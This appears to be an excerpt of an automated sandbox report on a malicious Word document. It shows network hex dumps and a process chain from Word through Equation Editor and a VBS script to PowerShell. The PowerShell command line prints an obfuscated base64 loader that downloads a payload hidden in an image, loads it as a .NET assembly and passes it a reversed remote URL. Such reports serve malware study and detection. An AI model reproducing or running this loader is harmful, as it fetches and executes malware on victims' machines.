                                        2024-09-09 15:34:39 UTC16384INData Raw: ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1 90 a2 ac 2e ae 15 68 10 4d
                                        Data Ascii: G8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui.hM
                                        2024-09-09 15:34:39 UTC16384INData Raw: dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d aa 8a 58 92 43 15 24 76 1f
                                        Data Ascii: q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]XC$v
                                        2024-09-09 15:34:39 UTC16384INData Raw: 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28 56 0e a7 72 f1 47 eb d7 8c
                                        Data Ascii: 62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(VrG
                                        2024-09-09 15:34:40 UTC16384INData Raw: 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93 ea b0 09 e3 25 27 75 72 43
                                        Data Ascii: <U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|%'urC
                                        2024-09-09 15:34:40 UTC16384INData Raw: 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad 53 23 6a da 35 44 24 ed 6d
                                        Data Ascii: e`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pWS#j5D$m
                                        2024-09-09 15:34:40 UTC16384INData Raw: e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a 7e 7e f8 19 92 e9 55 d6 49
                                        Data Ascii: is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z~~UI



                                        Target ID:0
                                        Start time:11:34:20
                                        Start date:09/09/2024
                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                        Imagebase:0x13f690000
                                        File size:1'423'704 bytes
                                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:11:34:34
                                        Start date:09/09/2024
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                        Imagebase:0x400000
                                        File size:543'304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:11:34:35
                                        Start date:09/09/2024
                                        Path:C:\Windows\SysWOW64\wscript.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs"
                                        Imagebase:0xd00000
                                        File size:141'824 bytes
                                        MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:9
                                        Start time:11:34:36
                                        Start date:09/09/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? 
?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?TwBm? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? 
? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwBl? ? ? ? ?C? ? ? ? ?? ? ? ? ?M? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?Kw? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?u? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?FM? ? ? ? ?dQBi? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? 
? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBD? ? ? ? ?G8? ? ? ? ?bgB2? ? ? ? ?GU? ? ? ? ?cgB0? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?EY? ? ? ? ?cgBv? ? ? ? ?G0? ? ? ? ?QgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GQ? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBS? ? ? ? ?GU? ? ? ? ?ZgBs? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Gk? ? ? ? ?bwBu? ? ? ? ?C4? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?Ew? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BU? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?Cg? ? ? ? ?JwBk? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GI? ? ? ? ?LgBJ? ? ? ? ?E8? ? ? ? ?LgBI? ? ? ? ?G8? ? ? ? ?bQBl? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?bQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B0? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?TQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?FY? ? ? ? ?QQBJ? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgB2? ? ? ? ?G8? ? ? ? ?awBl? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bu? ? ? ? ?HU? ? ? ? ?b? ? ? ? ?Bs? ? ? ? ?Cw? ? ? ? 
?I? ? ? ? ?Bb? ? ? ? ?G8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Fs? ? ? ? ?XQBd? ? ? ? ?C? ? ? ? ?? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?HQ? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?QwBI? ? ? ? ?E0? ? ? ? ?Ug? ? ? ? ?v? ? ? ? ?D? ? ? ? ?? ? ? ? ?NQ? ? ? ? ?v? ? ? ? ?DQ? ? ? ? ?O? ? ? ? ?? ? ? ? ?x? ? ? ? ?C4? ? ? ? ?MQ? ? ? ? ?0? ? ? ? ?DI? ? ? ? ?Lg? ? ? ? ?5? ? ? ? ?DM? ? ? ? ?Mg? ? ? ? ?u? ? ? ? ?DU? ? ? ? ?O? ? ? ? ?? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?OgBw? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?L? ? ? ? ?? ? ? ? ?n? ? ? ? ?FI? ? ? ? ?ZQBn? ? ? ? ?EE? ? ? ? ?cwBt? ? ? ? ?Cc? ? ? ? ?L? ? ? ? ?? ? ? ? ?n? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?p? ? ? ? ?? ? ? ? ?==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                        Imagebase:0xba0000
                                        File size:427'008 bytes
                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
